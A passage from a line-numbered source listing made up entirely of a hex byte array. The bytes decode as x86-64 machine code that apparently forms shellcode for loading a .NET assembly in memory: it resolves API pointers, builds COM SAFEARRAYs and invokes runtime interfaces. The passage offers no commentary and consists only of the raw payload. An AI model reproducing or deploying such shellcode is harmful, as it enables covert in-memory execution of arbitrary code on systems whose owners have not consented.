184 | 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, | |
185 | 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48, | |
186 | 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0, | |
187 | 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, | |
188 | 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
189 | 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, | |
190 | 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, | |
191 | 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, | |
192 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, | |
193 | 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, | |
194 | 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99, | |
195 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
196 | 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00, | |
197 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07, | |
198 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90, | |
199 | 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, | |
200 | 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00, | |
201 | 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35, | |
202 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, | |
203 | 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18, | |
204 | 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48, | |
205 | 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00, | |
206 | 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40, | |
207 | 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06, | |
208 | 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00, | |
209 | 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, | |
210 | 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00, | |
211 | 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
212 | 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10, | |
213 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, | |
214 | 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48, | |
215 | 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
216 | 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7, | |
217 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01, | |
218 | 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, | |
219 | 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1, | |
220 | 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, | |
221 | 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, | |
222 | 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55, | |
223 | 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82, | |
224 | 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04, | |
225 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0, | |
226 | 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45, | |
227 | 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, | |
228 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4, | |
229 | 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b, | |
230 | 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
231 | 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, | |
232 | 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82, | |
233 | 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c, | |
234 | 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, | |
235 | 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45, | |
236 | 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48, | |
237 | 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, | |
238 | 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10, | |
239 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48, | |
240 | 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, | |
241 | 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, | |
242 | 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, | |
243 | 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, | |
244 | 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, | |
245 | 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02, | |
246 | 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, | |
247 | 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, | |
248 | 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, | |
249 | 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, | |
250 | 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48, | |
251 | 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
252 | 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, | |
253 | 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, | |
254 | 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b, | |
255 | 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, | |
256 | 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8, | |
257 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, | |
258 | 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
259 | 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, | |
260 | 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10, | |
261 | 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, | |
262 | 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, | |
263 | 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc, | |
264 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, | |
265 | 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
266 | 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0, | |
267 | 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
268 | 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb, | |
269 | 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
270 | 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20, | |
271 | 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, | |
272 | 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, | |
273 | 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, | |
274 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, | |
275 | 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, | |
276 | 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, | |
277 | 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, | |
278 | 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, | |
279 | 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7, | |
280 | 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, | |
281 | 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48, | |
282 | 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b, | |
283 | 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
284 | 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00, | |
285 | 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b, | |
286 | 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2, | |
287 | 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, | |
288 | 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45, | |
289 | 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec, | |
290 | 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, | |
291 | 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00, | |
292 | 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
293 | 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
294 | 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18, | |
295 | 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00, | |
296 | 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, | |
297 | 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16, | |
298 | 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00, | |
299 | 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b, | |
300 | 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, | |
301 | 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, | |
302 | 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00, | |
303 | 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, | |
304 | 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
305 | 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95, | |
306 | 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff, | |
307 | 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00, | |
308 | 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, | |
309 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
310 | 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, | |
311 | 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff, | |
312 | 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00, | |
313 | 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, | |
314 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
315 | 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0, | |
316 | 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, | |
317 | 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8, | |
318 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, | |
319 | 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
320 | 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0, | |
321 | 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00, | |
322 | 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01, | |
323 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
324 | 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, | |
325 | 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
326 | 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, | |
327 | 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00, | |
328 | 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, | |
329 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
330 | 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41, | |
331 | 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, | |
332 | 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, | |
333 | 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
334 | 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, | |
335 | 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, | |
336 | 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, | |
337 | 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, | |
338 | 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45, | |
339 | 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff, | |
340 | 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, | |
341 | 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, | |
342 | 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30, | |
343 | 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
344 | 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, | |
345 | 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
346 | 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
347 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, | |
348 | 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, | |
349 | 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, | |
350 | 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, | |
351 | 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, | |
352 | 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, | |
353 | 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, | |
354 | 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01, | |
355 | 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
356 | 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, | |
357 | 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, | |
358 | 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, | |
359 | 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, | |
360 | 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85, | |
361 | 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85, | |
362 | 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
363 | 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, | |
364 | 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38, | |
365 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, | |
366 | 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, | |
367 | 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00, | |
368 | 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00, | |
369 | 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, | |
370 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
371 | 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00, | |
372 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, | |
373 | 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, | |
374 | 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, | |
375 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
376 | 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00, | |
377 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00, | |
378 | 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02, | |
379 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, | |
380 | 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, | |
381 | 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b, | |
382 | 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95, | |
383 | 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, | |
384 | 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00, | |
385 | 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
386 | 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00, | |
387 | 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
388 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, | |
389 | 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, | |
390 | 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, | |
391 | 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83, | |
392 | 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00, | |
393 | 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00, | |
394 | 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, | |
395 | 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48, | |
396 | 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00, | |
397 | 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff, | |
398 | 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48, | |
399 | 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00, | |
